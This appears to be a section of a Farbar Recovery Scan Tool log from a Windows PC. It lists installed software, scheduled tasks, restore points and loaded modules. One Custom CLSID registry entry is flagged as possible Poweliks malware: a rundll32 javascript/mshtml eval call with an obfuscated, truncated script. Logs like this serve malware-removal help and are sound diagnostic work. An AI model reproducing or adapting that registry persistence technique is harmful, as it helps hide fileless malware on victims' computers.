Java 7 Update 55 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86417055FF}) (Version: 7.0.550 - Oracle)
Java 7 Update 55 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217055FF}) (Version: 7.0.550 - Oracle)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
LEGO MINDSTORMS NXT x64 Driver (HKLM\...\{36E6DCFB-9D16-4213-9985-8B68EFEA6019}) (Version: 1.20.140.0 - LEGO)
Logitech Solar App 1.10 (HKLM\...\SolarApp) (Version: 1.10.3 - Logitech)
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
Math Kernel Libraries (64-bit) (Version: 1.0.31.0 - National Instruments) Hidden
Math Kernel Libraries (x32 Version: 1.0.31.0 - National Instruments) Hidden
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft Camera Codec Pack (HKLM\...\{9DCA0803-0890-4631-94BA-17DE31C49C40}) (Version: 16.4.1734.1104 - Microsoft Corporation)
Microsoft Dynamics CRM 2011 for Microsoft Office Outlook (HKLM-x32\...\Microsoft CRM Client) (Version: 5.0.9690.1992 - Microsoft Corporation)
Microsoft Lync 2010 SDK Runtime (HKLM-x32\...\{8AF10E19-4330-4077-A1B5-491ACDC24B08}) (Version: 4.0.7577.125 - Microsoft Corporation)
Microsoft Lync Web App Plug-in (HKLM\...\{6619085B-A9D5-4DDD-800B-964903EAF546}) (Version: 15.8.8308.726 - Microsoft Corporation)
Microsoft Office Professional 2013 - en-us (HKLM\...\ProfessionalRetail - en-us) (Version: 15.0.4659.1001 - Microsoft Corporation)
Microsoft Online Services Sign-in Assistant (HKLM\...\{CF2EFAB4-B938-47C6-8426-0FB50D610E92}) (Version: 7.250.4259.0 - Microsoft Corporation)
Microsoft ReportViewer 2010 Redistributable (HKLM-x32\...\{C19B3EB6-B54C-3204-A4DF-88432E0C79F7}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.10411.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server 2008 Native Client (HKLM\...\{C79A7EAB-9D6F-4072-8A6D-F8F54957CD93}) (Version: 10.0.1600.22 - Microsoft Corporation)
Microsoft SQL Server Compact 3.5 SP2 ENU (HKLM-x32\...\{28DA3304-9EC2-4097-BC64-B59A1958841F}) (Version: 3.5.8082.0 - Microsoft Corporation)
Microsoft SQL Server Compact 3.5 SP2 x64 ENU (HKLM\...\{F39076D7-7168-44CD-A2C6-EBC1CDA7DC1C}) (Version: 3.5.8082.0 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Mozilla Firefox 33.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 33.0.2 (x86 en-US)) (Version: 33.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 33.0.2 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
National Instruments Software (HKLM-x32\...\NI Uninstaller) (Version:  - National Instruments)
NI .NET Framework 4.0 (x32 Version: 4.01.49152 - National Instruments) Hidden
NI ActiveX Container (64-bit) (Version: 12.1.3.0 - National Instruments) Hidden
NI ActiveX Container (x32 Version: 12.1.3.0 - National Instruments) Hidden
NI Assistant Framework (x32 Version: 8.0.112.0 - National Instruments) Hidden
NI Assistant Framework 64-bit (Version: 8.0.120.0 - National Instruments) Hidden
NI Assistant Framework LabVIEW Code Generator 2012 (x32 Version: 8.0.70.0 - National Instruments) Hidden
NI Authentication 12.5.0 (64-bit) (Version: 12.5.199.0 - National Instruments) Hidden
NI Authentication 12.5.0 (x32 Version: 12.5.199.0 - National Instruments) Hidden
NI CodeSignAPI (x32 Version: 2.70.346 - National Instruments) Hidden
NI Curl 12.5.0 (64-bit) (Version: 12.5.197.0 - National Instruments) Hidden
NI Curl 12.5.0 (x32 Version: 12.5.197.0 - National Instruments) Hidden
NI Customer Experience Improvement Program (x32 Version: 1.1.21.0 - National Instruments) Hidden
NI DataSocket 5.0 (64-bit) (Version: 5.0.115.0 - National Instruments) Hidden
NI DataSocket 5.0 (x32 Version: 5.0.115.0 - National Instruments) Hidden
NI Distributed System Manager 2012 (x32 Version: 12.1.52.0 - National Instruments) Hidden
NI DN 2.0 SP1 installer (x32 Version: 2.11.49152 - National Instruments) Hidden
NI Error Reporting 2012 (x32 Version: 12.1.54.0 - National Instruments) Hidden
NI EulaDepot (x32 Version: 3.30.274 - National Instruments) Hidden
NI Example Finder 12.0 (x32 Version: 12.0.291.0 - National Instruments) Hidden
NI GMP Windows 32-bit Installer 12.0.0 (x32 Version: 12.0.46.0 - National Instruments) Hidden
NI GMP Windows 64-bit Installer 12.0.0 (Version: 12.0.46.0 - National Instruments) Hidden
NI Help Assistant 2.0 (64bit) (Version: 2.0.3 - National Instruments) Hidden
NI Help Assistant 2.0 (x32 Version: 2.0.3 - National Instruments) Hidden
NI Instrument IO Assistant for LabVIEW 2012 32-bit (x32 Version: 1.0.24.0 - National Instruments) Hidden
NI LabVIEW 2011 Real-Time NBFifo (x32 Version: 11.0.250.0 - National Instruments) Hidden
NI LabVIEW 2012 Help (x32 Version: 12.1.51.0 - National Instruments) Hidden
NI LabVIEW 2012 Help File (x32 Version: 12.1.48.0 - National Instruments) Hidden
NI LabVIEW 2012 Manuals (x32 Version: 12.1.51.0 - National Instruments) Hidden
NI LabVIEW 2012 Real-Time Error Dialog (x32 Version: 12.0.71.0 - National Instruments) Hidden
NI LabVIEW 2012 Real-Time NBFifo (x32 Version: 12.0.219.0 - National Instruments) Hidden
NI LabVIEW 2012 Run-Time Engine Web Server (x32 Version: 12.5.198.0 - National Instruments) Hidden
NI LabVIEW 2012 Scripting Code Generator (x32 Version: 8.0.247.0 - National Instruments) Hidden
NI LabVIEW 2012 Search (x32 Version: 12.0.4.0 - National Instruments) Hidden
NI LabVIEW 2012 Simulation (x32 Version: 12.0.359.0 - National Instruments) Hidden
NI LabVIEW 2012 SP1 (32-bit) (x32 Version: 12.1.104.0 - National Instruments) Hidden
NI LabVIEW 2012 SP1 (32-bit) (x32 Version: 12.1.53.0 - National Instruments) Hidden
NI LabVIEW 2012 SP1 Deployable License (x32 Version: 12.1.52.0 - National Instruments) Hidden
NI LabVIEW 2012 SP1 Deployment Framework (x32 Version: 12.0.463.0 - National Instruments) Hidden
NI LabVIEW 2012 SP1 f5 (x32 Version: 12.1.65.0 - National Instruments) Hidden
NI LabVIEW 2012 SP1 License (x32 Version: 12.1.52.0 - National Instruments) Hidden
NI LabVIEW 2012 SP1 MeasAppChm File (x32 Version: 12.1.51.0 - National Instruments) Hidden
NI LabVIEW 2012 SP1 Module for LEGO® MINDSTORMS® (x32 Version: 12.1.310 - National Instruments) Hidden
NI LabVIEW 2012 SP1 Run-Time Engine Non-English Support. (x32 Version: 12.1.52.0 - National Instruments) Hidden
NI LabVIEW 2012 SP1 Variable Web Service (x32 Version: 12.1.51.0 - National Instruments) Hidden
NI LabVIEW 2012 SP1 Web Server (x32 Version: 12.5.198.0 - National Instruments) Hidden
NI LabVIEW Broker (64 bit) (Version: 6.8.10.0 - National Instruments) Hidden
NI LabVIEW Broker (x32 Version: 6.8.10.0 - National Instruments) Hidden
NI LabVIEW C Interface (x32 Version: 1.0.1 - National Instruments) Hidden
NI LabVIEW Compare Utility 12.0.0 (x32 Version: 12.1.51.0 - National Instruments) Hidden
NI LabVIEW for LEGO MINDSTORMS Mode (x32 Version: 12.1.18.0 - National Instruments) Hidden
NI LabVIEW MAX XML (x32 Version: 9.0.6.0 - National Instruments) Hidden
NI LabVIEW Merge Utility 2012 SP1 (x32 Version: 12.1.51.0 - National Instruments) Hidden
NI LabVIEW Run-Time Engine 2011 SP1 (x32 Version: 11.0.448.0 - National Instruments) Hidden
NI LabVIEW Run-Time Engine 2012 SP1 f5 (x32 Version: 12.1.64.0 - National Instruments) Hidden
NI LabVIEW Run-Time Engine Interop 2011 (x32 Version: 11.0.449.0 - National Instruments) Hidden
NI LabVIEW Run-Time Engine Interop 2012 SP1 (x32 Version: 12.1.64.0 - National Instruments) Hidden
NI LabVIEW Toolkit for MINDSTORMS® Competitions 2014-2015 (x32 Version: 14.0.25 - National Instruments) Hidden
NI LabVIEW Web Server for Run-Time Engine (x32 Version: 11.0.375.0 - National Instruments) Hidden
NI LabVIEW Web Services Runtime (x32 Version: 12.5.128.0 - National Instruments) Hidden
NI LabWindows/CVI 2010 LabVIEW DLL Builder (x32 Version: 10.0.0360 - National Instruments) Hidden
NI LabWindows/CVI 2010 SP1 Analysis Library (64-bit) (Version: 10.0.1434 - National Instruments) Hidden
NI LabWindows/CVI 2010 SP1 Analysis Library (x32 Version: 10.0.1434 - National Instruments) Hidden
NI LabWindows/CVI 2010 SP1 Code Generator (x32 Version: 10.0.1434 - National Instruments) Hidden
NI LabWindows/CVI 2010 SP1 Low-Level Driver (Original) (x32 Version: 10.0.1434 - National Instruments) Hidden
NI LabWindows/CVI 2010 SP1 Low-Level Driver (Updated) (x32 Version: 10.0.1434 - National Instruments) Hidden
NI LabWindows/CVI 2010 SP1 Network Variable Library (64-bit) (Version: 10.0.1434 - National Instruments) Hidden
NI LabWindows/CVI 2010 SP1 Network Variable Library (x32 Version: 10.0.1434 - National Instruments) Hidden
NI LabWindows/CVI 2010 SP1 Run-Time Engine (64-bit) (Version: 10.0.1434 - National Instruments) Hidden
NI LabWindows/CVI 2010 SP1 TDM Streaming Library (64-bit) (Version: 10.0.1434 - National Instruments) Hidden
NI LabWindows/CVI 2010 SP1 TDM Streaming Library (x32 Version: 10.0.1434 - National Instruments) Hidden
NI LabWindows/CVI Run-Time Engine 2010 SP1 (Updated) (x32 Version: 10.0.1434 - National Instruments) Hidden
NI LabWindows/CVI Run-Time Engine 2010 SP1 (x32 Version: 10.0.1434 - National Instruments) Hidden
NI Launcher (x32 Version: 3.11.177 - National Instruments) Hidden
NI License Manager (x32 Version: 3.7.50 - National Instruments) Hidden
NI Logos 5.4 (64-bit) (Version: 5.4.350.0 - National Instruments) Hidden
NI Logos 5.4 (x32 Version: 5.4.350.0 - National Instruments) Hidden
NI Logos LabVIEW 2012 Support (x32 Version: 12.1.51.0 - National Instruments) Hidden
NI Logos XT Support (x32 Version: 5.4.342.0 - National Instruments) Hidden
NI Logos64 XT Support (Version: 5.4.342.0 - National Instruments) Hidden
NI Math Kernel Libraries (64-bit) (Version: 1.0.10.0 - National Instruments) Hidden
NI Math Kernel Libraries (x32 Version: 1.0.10.0 - National Instruments) Hidden
NI MAX Remote Configuration 64-bit Installer 5.4 (Version: 5.40.49152 - National Instruments) Hidden
NI MAX Remote Configuration Installer 5.4 (x32 Version: 5.40.49152 - National Instruments) Hidden
NI MAX Support for 64 Bit Windows (Version: 5.40.49152 - National Instruments) Hidden
NI MDF Support (x32 Version: 3.30.274 - National Instruments) Hidden
NI mDNS Responder 2.1.1 (x32 Version: 2.11.49152 - National Instruments) Hidden
NI mDNS Responder 2.1.1 for Windows 64-bit (Version: 2.11.49152 - National Instruments) Hidden
NI Measurement & Automation Explorer 5.4.0 (x32 Version: 5.40.49152 - National Instruments) Hidden
NI Measurement Studio ComponentWorks 3D Graph (x32 Version: 8.6.10603 - National Instruments) Hidden
NI Measurement Studio Recipe Processor (x32 Version: 8.0.0101 - National Instruments) Hidden
NI MetaSuite Installer (x32 Version: 3.11.171 - National Instruments) Hidden
NI MXS 5.4.0 (x32 Version: 5.40.49152 - National Instruments) Hidden
NI MXS 5.4.0 for 64 Bit Windows (Version: 5.40.49152 - National Instruments) Hidden
NI Network Discovery 5.4 (x32 Version: 5.40.49152 - National Instruments) Hidden
NI Network Discovery 5.4 for Windows 64-bit (Version: 5.40.49152 - National Instruments) Hidden
NI NI LabVIEW 2011 SP1 Run-Time Engine Non-English Support (x32 Version: 11.0.302.0 - National Instruments) Hidden
NI OPC Support (x32 Version: 12.0.295.0 - National Instruments) Hidden
NI Portable Configuration 5.3.0 (x32 Version: 5.30.49152 - National Instruments) Hidden
NI Portable Configuration for 64 Bit Windows 5.3.0 (Version: 5.30.49152 - National Instruments) Hidden
NI Registration Wizard (x32 Version: 1.3.94.0 - National Instruments) Hidden
NI Remote Provider for MAX 5.4.0 (x32 Version: 5.40.49152 - National Instruments) Hidden
NI Remote PXI Provider for MAX 5.3.0 (x32 Version: 5.30.49152 - National Instruments) Hidden
NI Search Shared (x32 Version: 12.0.5.0 - National Instruments) Hidden
NI Security Update (KB 67L8LCQW) (64-bit) (Version: 1.0.29.0 - National Instruments) Hidden
NI Security Update (KB 67L8LCQW) (x32 Version: 1.0.29.0 - National Instruments) Hidden
NI Security Update (KB67L8LIQW) (x32 Version: 8.6.10500 - National Instruments) Hidden
NI SLCP 1.0 (x32 Version: 1.0.63.0 - National Instruments) Hidden
NI Software Provider for MAX 5.3.0 (x32 Version: 5.30.49152 - National Instruments) Hidden
NI SSL LabVIEW 2012 SP1 Support (x32 Version: 12.5.198.0 - National Instruments) Hidden
NI SSL LabVIEW RTE 2012 SP1 Support (x32 Version: 12.5.8.0 - National Instruments) Hidden
NI SSL Support (64-bit) (Version: 12.5.199.0 - National Instruments) Hidden
NI SSL Support (x32 Version: 12.5.199.0 - National Instruments) Hidden
NI System API Client for WIF 5.4.0 (x32 Version: 5.40.215.0 - National Instruments) Hidden
NI System API Web-Servce 32-bit 5.4.0 (x32 Version: 5.40.236.0 - National Instruments) Hidden
NI System API Windows 32-bit 5.4.0 (x32 Version: 5.40.220.0 - National Instruments) Hidden
NI System API Windows 64-bit 5.4.0 (Version: 5.40.220.0 - National Instruments) Hidden
NI System Configuration 5.4.0 LabVIEW Support (x32 Version: 5.40.79.0 - National Instruments) Hidden
NI System Configuration LV2012 Support 5.4.0 (x32 Version: 5.40.76.0 - National Instruments) Hidden
NI System Configuration Runtime 5.4.0 (x32 Version: 5.40.108.0 - National Instruments) Hidden
NI System Configuration Runtime 5.4.0 for Windows 64-bit (Version: 5.40.108.0 - National Instruments) Hidden
NI System State Publisher (64-bit) (Version: 12.1.46.0 - National Instruments) Hidden
NI System State Publisher (x32 Version: 12.0.446.0 - National Instruments) Hidden
NI System Web Server 12.0 (x32 Version: 12.5.199.0 - National Instruments) Hidden
NI System Web Server Base 12.5.0 (64-bit) (Version: 12.5.198.0 - National Instruments) Hidden
NI System Web Server Base 12.5.0 (x32 Version: 12.5.198.0 - National Instruments) Hidden
NI TDM Excel Add-In 3.4 (x32 Version: 3.4.19.0 - National Instruments) Hidden
NI TDM Excel Add-In 3.4 64-bit (Version: 3.4.19.0 - National Instruments) Hidden
NI TDM Streaming 2.4 (64-bit) (Version: 2.4.55.0 - National Instruments) Hidden
NI TDM Streaming 2.4 (x32 Version: 2.4.55.0 - National Instruments) Hidden
NI Trace Engine (64-bit) (Version: 12.0.401.0 - National Instruments) Hidden
NI Trace Engine (x32 Version: 12.0.401.0 - National Instruments) Hidden
NI Uninstaller (x32 Version: 3.30.274 - National Instruments) Hidden
NI Update Service 2.2.5 (x32 Version: 2.25.79 - National Instruments) Hidden
NI USI 2.0.0 (x32 Version: 2.0.04901 - National Instruments) Hidden
NI USI 2.0.0 64-Bit (Version: 2.0.04901 - National Instruments) Hidden
NI Variable Engine (64-bit) (Version: 2.6.296.0 - National Instruments) Hidden
NI Variable Engine 2.6.0 (x32 Version: 2.6.296.0 - National Instruments) Hidden
NI Variable Engine LabVIEW 2012 Support (x32 Version: 12.1.51.0 - National Instruments) Hidden
NI VC2005MSMs x64 (Version: 8.05.0 - National Instruments) Hidden
NI VC2005MSMs x86 (x32 Version: 8.05.0 - National Instruments) Hidden
NI VC2008MSMs x64 (Version: 9.0.401 - National Instruments) Hidden
NI VC2008MSMs x86 (x32 Version: 9.0.401 - National Instruments) Hidden
NI VC2010SP1MSMs x64 (Version: 10.0.100 - National Instruments) Hidden
NI VC2010SP1MSMs x86 (x32 Version: 10.0.100 - National Instruments) Hidden
NI VIPM Helper 2012 (x32 Version: 12.0.211.0 - National Instruments) Hidden
NI Web Application Server 12.0 (64-bit) (Version: 12.5.198.0 - National Instruments) Hidden
NI Web Application Server 12.0 (x32 Version: 12.5.198.0 - National Instruments) Hidden
NI Web Interface Framework 2012 (x32 Version: 12.5.138.0 - National Instruments) Hidden
NI Web Pipeline 2.0.1 (x32 Version: 2.0.128.0 - National Instruments) Hidden
NI Web Pipeline 2.0.1 64-bit support (Version: 2.0.122.0 - National Instruments) Hidden
NI Xalan Delay Load 1.10.2 (x32 Version: 1.10.72.0 - National Instruments) Hidden
NI Xalan Delay Load 1.10.2 64-bit (Version: 1.10.73.0 - National Instruments) Hidden
NI Xerces Delay Load 2.7.3 (x32 Version: 2.7.180.0 - National Instruments) Hidden
NI Xerces Delay Load 2.7.3 64-bit (Version: 2.7.190.0 - National Instruments) Hidden
NI-DAQmx/LabVIEW shared documentation 9.5.5 (x32 Version: 9.55.49152 - National Instruments) Hidden
NI-DAQmx/LabVIEW shared documentation for 64 Bit Windows 9.5.5 (Version: 9.55.49152 - National Instruments) Hidden
Nikon Message Center 2 (HKLM-x32\...\{B014EE44-9197-4513-9613-71E6EB1B514E}) (Version: 2.1.0 - Nikon)
Nikon Movie Editor (HKLM-x32\...\{5CAD3393-EEC0-44CE-9F93-BCAA365B77FB}) (Version: 2.7.0 - Nikon)
NI-Mesa (Version: 11.0.11.0 - National Instruments) Hidden
NI-Mesa (x32 Version: 11.0.11.0 - National Instruments) Hidden
NI-RPC 4.3.0f0 (x32 Version: 4.30.49152 - National Instruments) Hidden
NI-RPC 4.3.0f0 for 64 Bit Windows (Version: 4.30.49152 - National Instruments) Hidden
NI-RPC 4.3.0f0 for Phar Lap ETS (x32 Version: 4.30.49152 - National Instruments) Hidden
NVIDIA Graphics Driver 327.62 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 327.62 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.26.4 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.26.4 - NVIDIA Corporation)
NVIDIA nView 140.75 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NView) (Version: 140.75 - NVIDIA Corporation)
Office 15 Click-to-Run Extensibility Component (x32 Version: 15.0.4659.1001 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Licensing Component (Version: 15.0.4659.1001 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Localization Component (x32 Version: 15.0.4659.1001 - Microsoft Corporation) Hidden
Open XML SDK 2.0 for Microsoft Office (HKLM-x32\...\{171D8D76-3F05-455A-A8AF-C561C2679905}) (Version: 2.0.5022 - Microsoft Corporation)
PBA Driver (Version: 1.0.1.7 - Dell Inc.) Hidden
Picture Control Utility x64 (HKLM\...\{11953C65-BB4E-4CA4-B0F0-2600A4B20040}) (Version: 1.4.11 - Nikon)
Preboot Manager (Version: 03.05.00.026 - Wave Systems Corp.) Hidden
Private Information Manager (Version: 07.03.00.016 - Wave Systems Corp.) Hidden
RDp version 12.10.0 (HKLM-x32\...\{F2151451-7715-4671-9044-3B9EE0AA4D7D}_is1) (Version: 12.10.0 - JacobLis.com)
Readiris Pro 10 (HKLM-x32\...\{14D08502-FEE4-40E5-90D3-8A967A1D8BA2}) (Version:  - )
Reset NI Config 5.0.0 (x32 Version: 5.0.146.0 - National Instruments) Hidden
SI TSS (Version: 2.1.41 - Security Innovation) Hidden
SmarThru 4 (HKLM-x32\...\{90F1943D-EA4A-4460-B59F-30023F3BA69A}) (Version:  - )
SmarThru PC Fax (HKLM-x32\...\SmarThru PC Fax) (Version:  - )
SolidWorks Enterprise PDM (HKLM\...\{96E13B88-4AC5-40CD-8435-8C2BD057C001}) (Version: 14.02.0714 - SolidWorks Corporation)
SPBA (WBF) 5.9 (Version: 5.9.7.7232 - Authentec Inc.) Hidden
ST Microelectronics 3 Axis Digital Accelerometer Solution (HKLM-x32\...\{9C24F411-9CA7-4A8A-91F3-F08A4A38EB31}) (Version: 4.10.0030 - ST Microelectronics)
TeamViewer 6 Host (HKLM-x32\...\TeamViewer 6 Host) (Version: 6.0.10722 - TeamViewer GmbH)
Time Clock version 12.11.0 (HKLM-x32\...\{8B4F8277-D2D7-44F1-B5DF-F4F5C87CABF6}_is1) (Version: 12.11.0 - Jacob Liscom)
toolkit32for64bit (x32 Version: 7.68.85.0013 - Wave Systems Corp) Hidden
Trusted Drive Manager (Version: 5.0.0.304 - Wave Systems Corp.) Hidden
UFR II Printer Driver Uninstaller (HKLM\...\Canon UFR II Printer Driver) (Version: 6, 1, 0, 0 - Canon Inc.)
Update Rollup 6 for Microsoft Dynamics CRM for Outlook (KB2600640) (HKLM-x32\...\KB2600640_Client_1033) (Version: 5.0.9690.1992 - Microsoft Corporation)
ViewNX 2 (HKLM\...\{635BE602-BB9C-4C59-8CC5-93F9366E8A21}) (Version: 2.7.4 - Nikon)
Wave Crypto Runtime 2.0.9.0 x64 (Version: 02.00.09.0000 - Wave Systems Corp) Hidden
Wave Crypto Runtime 2.0.9.0 x86 (x32 Version: 02.00.09.0000 - Wave Systems Corp) Hidden
Wave Infrastructure Installer (Version: 07.68.85.0014 - Wave Systems Corp) Hidden
Wave Support Software Installer (Version: 05.15.00.021 - Wave Systems Corp) Hidden
WebEx Productivity Tools (HKLM-x32\...\{A19738DD-B398-415F-8A61-40C724A6A73A}) (Version: 2.1.1400 - Cisco WebEx LLC)
WIF Core Dependencies Windows 5.4.0 (x32 Version: 5.40.69.0 - National Instruments) Hidden
Windows Driver Package - Leapfrog (Leapfrog-USBLAN) Net  (09/10/2009 02.03.05.012) (HKLM\...\8F14F2ECEDE68D26EA515B48DC25B39103C4FE8D) (Version: 09/10/2009 02.03.05.012 - Leapfrog)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
WinRAR 5.20 beta 2 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.20.2 - win.rar GmbH)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-1619941995-4271792153-444280415-1167_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?

==================== Restore Points  =========================

31-10-2014 21:31:22 Windows Update
03-11-2014 20:03:36 Windows Update
03-11-2014 20:04:07 Windows Update
03-11-2014 20:05:33 Windows Update

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2014-11-03 14:48 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {0A562D10-42B3-4B37-8DD8-F826ADD2CD0F} - System32\Tasks\Microsoft\Windows\PLA\KCTR$1245 => Rundll32.exe C:\Windows\system32\pla.dll,PlaHost "KCTR$1245" "$(Arg0)"
Task: {1BF18B5B-38B8-4F14-A944-1C521D9431B4} - System32\Tasks\Microsoft Office 15 Sync Maintenance for {3cb986d6-91c6-4e57-9f69-11185dadd832} ADC69.adc.com => C:\Program Files\Microsoft Office 15\Root\Office15\MsoSync.exe [2014-09-16] (Microsoft Corporation)
Task: {26F13908-B242-4EDE-8244-B202FC3A196E} - System32\Tasks\Microsoft\Windows\PLA\KCTR$1265 => Rundll32.exe C:\Windows\system32\pla.dll,PlaHost "KCTR$1265" "$(Arg0)"
Task: {2F223DDA-408A-4FF7-B091-A4F4BC686A23} - System32\Tasks\Microsoft\Windows\PLA\KCTR$1003 => Rundll32.exe C:\Windows\system32\pla.dll,PlaHost "KCTR$1003" "$(Arg0)"
Task: {34413358-051F-42CA-BB6F-0B7E492A084C} - System32\Tasks\Microsoft\Windows\PLA\KCTR$1000 => Rundll32.exe C:\Windows\system32\pla.dll,PlaHost "KCTR$1000" "$(Arg0)"
Task: {39129A2A-0E8E-4DEE-AFD2-C2C396CC5558} - System32\Tasks\Microsoft\Windows\PLA\KCTR$1429 => Rundll32.exe C:\Windows\system32\pla.dll,PlaHost "KCTR$1429" "$(Arg0)"
Task: {6401F1FD-7EE1-4874-8C33-2A32FD019610} - System32\Tasks\WSCEAA => C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\RemoteManagement\WSCEAA.exe [2012-10-17] (Wave Systems Corp.)
Task: {7C98D515-88D0-48B0-9BBC-571271F39C98} - System32\Tasks\Microsoft\Windows\PLA\KCTR$1244 => Rundll32.exe C:\Windows\system32\pla.dll,PlaHost "KCTR$1244" "$(Arg0)"
Task: {937498CF-F3C6-42F0-95A3-2C0FEBB7B492} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {952F0C0C-CAE5-4A9F-8511-841E2A5C5E14} - System32\Tasks\NIUpdateServiceCheckTask => C:\Program Files (x86)\National Instruments\Shared\Update Service\NIUpdateService.exe [2012-11-16] (National Instruments)
Task: {A4AC7ECA-B910-42F4-BA10-263A0104BFA0} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-24] (Adobe Systems Incorporated)
Task: {AD332114-26E0-4546-8872-302B310DA61C} - System32\Tasks\Microsoft\Windows\PLA\KCTR$1246 => Rundll32.exe C:\Windows\system32\pla.dll,PlaHost "KCTR$1246" "$(Arg0)"
Task: {BA0DEFBB-D99E-4EA3-A5EF-A85921CBC8AE} - System32\Tasks\Microsoft\Windows\PLA\KCTR$1247 => Rundll32.exe C:\Windows\system32\pla.dll,PlaHost "KCTR$1247" "$(Arg0)"
Task: {C6D0C48E-F99E-4C1A-9747-9225A41CD745} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2014-09-25] (Microsoft Corporation)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\Defrag.job => C:\Windows\system32\Defrag.exe

==================== Loaded Modules (whitelisted) =============

2010-01-20 06:49 - 2010-01-20 06:49 - 00027648 _____ () C:\Windows\System32\sdo2ml6.dll
2013-01-24 11:07 - 2013-01-24 11:07 - 00824832 _____ () C:\Windows\system32\spool\DRIVERS\x64\3\sdo2mdu.dll
2014-06-03 08:34 - 2014-05-20 08:19 - 00105640 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll
2012-11-20 07:52 - 2012-11-20 07:52 - 00225720 _____ () C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\EmbassyServer.exe
2012-11-20 07:51 - 2012-11-20 07:51 - 00038840 _____ () C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\DeviceStatus.dll
2012-11-23 17:34 - 2012-11-23 17:34 - 00020480 _____ () C:\Program Files\Dell\Dell Data Protection\Access\Advanced\hapi64\pbadrvsvc.exe
2013-02-20 17:07 - 2013-10-28 18:38 - 00097568 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
